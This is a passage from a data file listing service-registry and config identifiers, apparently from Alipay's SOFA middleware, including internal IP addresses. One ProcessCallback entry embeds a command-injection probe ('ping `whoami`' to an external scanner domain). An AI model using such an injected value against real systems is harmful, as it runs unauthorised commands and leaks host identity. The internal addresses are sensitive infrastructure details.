esource.noRetryErrorCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeapcore:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ck:name=com.alipay.zdal.config.groupCluster.finslip_instInfoTddlDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acauthcore.common.service.facade.manager.ActionManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.metadata.conf.facade.CtuMetaObjectClientService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.contentlib.common.service.facade.content.FengdieContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.business.BusinessMngConfigFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.96.222#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.mashup:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.jdbcUrlCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.dmirror:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insxhbclaimprod.common.service.facade.ClaimContractSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmodelcenter.common.service.facade.riskentity.ChangePlatformFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mobilecommunity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.cloudinc.core.antvip.AntvipDrmControl.updateNormalGlobalDomainsVersionDelaySec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.echox.service.EchoxAopPlaybackService:1.0:pcardcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcheck.common.service.facade.api.RuleNodeCheckerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.recruit.ItemRecruitApplyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.sdk.risk.callback.RiskDefenseCheckCallback:1.0:opscloudflow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.cif.client.drm.NearDataTairRouterSwitcher.modelBlackConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.acdoccore.common.service.facade.category.DocProdutcConfManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custgrowth.common.service.facade.CrowdSyncService:1.0:syncPayDataCenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundtrade.common.service.facade.api.FundDividendMethodFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mquery.common.service.facade.AccountTradeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.ordercore.SignAfterOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdecision.common.service.facade.api.FundSwitchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.insttrade.insttrade_ds.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.SimpleThreadExecutorParamDrm.config,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-chartcubetwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.migrate.drm.SceneMigrateTaskDrm.dataSyncLoadEndMinutes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ifxquote.core.service.strategy.StrategyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.datacontextlib.service.facade.dataswap.DataSwapConsumeService:1.0:${datacontext_service_unique_id}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.customscenter.ccDS.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsTempManager.contentStyleSceneSetStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S_finquantprod_scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegeocoding.common.service.facade.nearby.NearBySearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininsightcore.common.service.facade.silkbag.SilkBagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInGlobalSwitchValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.30.209.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.159.147#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:riskmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_PAYSETTLE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.158.56.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.koubei.kbordersync.common.service.facade.api.OrderReceiptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:datariskmarket-parent@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.antgroup.zmxy.zmcacceptance.common.service.facade.DepositEvaluateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.point.PointTradeQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctransquery.common.service.facade.api.FreezeLogQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.tairHitRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pricemng.common.service.facade.api.price.PricemngPriceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.18.116.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:yebscenebff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.defaultEncodeTestRunSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ctuofflineplt.common.facade.service.FtgRefluxService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.0.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zcbsalescenter.common.service.facade.trade.CashingInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promoplaycenter.common.service.facade.api.AccountOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.158.121.207#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.airbops:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.overseaprod.common.service.receipt.ReceiptCustomerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:idataops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_R_MERCHANT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.exchangecore.common.service.facade.ExChannelQueryWService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.FindResourceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:giftprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.130.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.166.154.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.secuprod:name=com.alipay.secuprod.biz.fund.common.FundAIPConfig.fundAIPTips,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:zmCredit_zmcustcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.120.11#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.feature.common.service.facade.service.FeatureDvQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.ding.DingDepartmentRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antcloud.productcenter.common.service.facade.OverdueInstanceSofaRest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_OPENCTRL#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.ryb.drm.RYBParamDrmManager.closeTradeFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finvirtualta.biz.fund.process.engine.FundModelConstructEngine:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.revtransTairCache.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finbankcore.common.service.facade.PointsExchangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.ApiExecuteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fincommonbff:name=com.alipay.fincommonbff.chair.Config.proxySnapshotMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_S_1211#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.imif.common.service.facade.api.MerchantContactPersonQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zpublishuiweb:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEndWith,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.24.1.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mcenter.common.dal.mdata.auto.daointerface.ForexSettleBatchDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.file.AttachmentCategoryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.amsAssistantTBaseCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:workflow_feedback_feedbackPlatformGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityservice.facade.activeservice.test.IvrTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.common.service.facade.api.CfpVoucherManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.collectGrayFlow,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gotone.common.service.api.SendLocalPushService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.174.189#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acorchestracore.endpoint.sofarest.ServiceDbRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.ck:name=com.alipay.zdal.config.groupCluster.zbdmDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.18.118.177#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ck:name=com.alipay.zdal.config.groupCluster.mwalletmng_mobileDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fraudmng:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmResourceManager.regressionParams,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeexprod:name=com.alipay.common.security.dresource.SecurityCommonDrm.escapeSchemeChecks,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.compass.common.service.facade.api.NonstandardServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.code.CodeStrategyFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.114.65#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.findtprod:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iliquidity.service.facade.api.bankaccountflow.BankAccountSecurityBufferDataSourceFacade:1.0:gnfpsBankAccountSecurityBufferDataSourceFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:securitydata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanrepayprod.common.service.facade.service.repay.RepayProdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.overseamerchant.api.OSMerchanttransTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinsight.service.api.portal.RptRoleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:secperfcap@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custprod.service.api.antopen.AntOpenPlatformMemberSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipHvpsResource.resendDaytimeMsg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudprovision:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.keplerweb.keplerui_ds.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbriskcenter.common.service.facade.user.CraftsmanInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.risk.RiskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofaserver.facade.ZproxyGPvSofaService:1.0:zproxyGForMR@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:hainaprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:;ping `whoami`86842598-80102053-uniqueId-104003029.antscanner.global.alipay.com;@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteUrls,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finassistantmng.common.service.facade.api.ProblemServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.SendDingDingService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:distinguishprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.order.MerchantOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.roplib.core.service.namelist.RopPunishWhitelistService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetdecision.common.service.facade.api.StrategyConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.back.TlouDataSourceMsgFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudinc:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcardcore.common.service.facade.McardCampFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchainprod.common.facade.query.TradeViewService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.88.136#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.customerTairCache.monitorHAValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mychain.baas.facade.ProductManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.179.130#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securityexprod.biz.alipayauth.service.BaseAlipayAuthService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.prodmng.core.service.drm.impl.AuditControlDRMImpl.newProcess,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secuinfos.common.v3.service.facade.api.special.SpecialSceneConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.aclinkelib.common.service.facade.ComponentQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.permlimitnear:name=com.alipay.rule.core.engine.config.RuleEngineResource.rulePerfJudgements,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.codprod.common.service.facade.logistics.facade.CaiNiaoWayBillStatusNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcloanoperation@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxprod.common.service.facade.api.attribute.CatalogAttributeConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custprod.service.spi.CustBizOperatorConselClient:1.0:bkloanapply@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lifemng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegeocoding.common.service.facade.BizAreaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileic.common.adapter.prod.sms.MiclibMobileServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP-F-MOBILEPM_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cif.facade.LoginService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:222@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkoyzcore_closeProcessCallback_v2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:ins.surrender.template.scene.general@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cardbin.common.service.facade.CardBinClientFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.officialTeamPortraitUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.drm.insureddrmhandler.newInsuredProductIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insapportion.apportion.service.PublicityClaimService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.facade.agreement.spi.callback.PayAuthManageCallBackService:1.0:yebstarwish@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofamesh.sofa4RpcMosnServer.facade.Sofa4RpcMosnServerSp1Facade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.244.216#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.testmeshend.facade.ServiceOfObserveMode4:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pvsofaserver.facade.ZproxyCPvSofaService:1.0:zproxyCForM@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue16#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insapportion.apportion.service.enterprise.EnterpriseEmployeeApportionDetailService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icardcenter.service.facade.api.write.CardMigrationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.GreyMonitorConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudbox.facade.apibus.service.servers.ServerReplaceOperationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkoyzcore_fallback2ConfigProcessCallback_v2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:insmobile@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebpp.MiscConfFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ldcVipSwitch:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finbaservice.common.service.facade.ficc.goldb2c.api.ShareTemplateConfQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:myFlowProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omp.common.service.facade.api.ActivityPlanService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcheck.common.service.facade.api.AntqMessageReceiveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icdpcore.common.service.facade.api.CreativeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.AntVipDefaultAppName:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.seekers.facade.apis.EntityDiagnosisResponseReceiver:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.risklevel.RiskLevelService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.CommonTriggerDrm.sasAidStartDate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.30.192.179#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.tss.supportprod.facade.bds.facade.require.RequireFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundIndicatorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agap.service.facade.api.TraceDataService:1.0:tcService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.XinQianActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradeapcore.service.api.TradeapRecoveryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.mpoint.facade.MpointExpireQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cif.facade.CustomerRoleInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ordermng.common.service.api.order.OrderAnnualAuditService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.dback.api.DbackSlipQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uemprod.common.service.facade.dragonxroute.DragonxRouteServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:fxDelayTAExchangeTaskExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_IDEPLOY#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.FirstPayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.service.PcreditMarketAwardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.137.116#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.73.148.75#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.infosectask:name=com.alipay.holoxlib.core.backtrack.drm.BacktrackConfigResource.holoxCheckUrlQps,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fincommontaskhub.service.facade.schedule.TaskhubSofaScheduler:1.0:finsceneyebprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:govbizprodsys@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:etenOa_ProcessCallBackFacade@DEFAULT#@#DEFAULT_INS